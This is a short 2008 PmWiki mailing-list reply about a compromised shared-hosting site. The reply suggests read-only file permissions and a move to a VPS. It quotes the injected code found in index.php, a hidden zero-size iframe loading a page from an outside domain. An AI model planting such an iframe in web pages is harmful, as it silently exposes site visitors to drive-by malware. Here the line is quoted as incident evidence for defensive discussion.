On Wed, Sep 3, 2008 at 2:50 PM, Erik Haagensen <[EMAIL PROTECTED]> wrote:
> The index.php (and several other files) contains this now:
>
> <?php include('pmwiki.php');
> <iframe src="http://mixlong.cn/in/"; width=0 height=0 frameborder=0></iframe>I reported the same incident a few months ago. It happened on shared hosting. The files were NOT writable by the web server, only by the owner. My guess is that vulnerabilities in other scripts were being exploited. The fast solution is to make all files read-only except for the wiki.d directory. If the site is only edited by you occasionally, then that directory can be read-only too. Just chmod the directory in your FTP client or via SSH before editing, then set it back afterwards. The other thing I did was move to a VPS where you don't have 100 other users prowling around the same installation. Even if Pmwiki is secure, loopholes in other user's scripts and applications mean they could be used to inject malicious data into Pmwiki files, or any other files which are writeable. Marcus _______________________________________________ pmwiki-users mailing list [email protected] http://www.pmichaud.com/mailman/listinfo/pmwiki-users
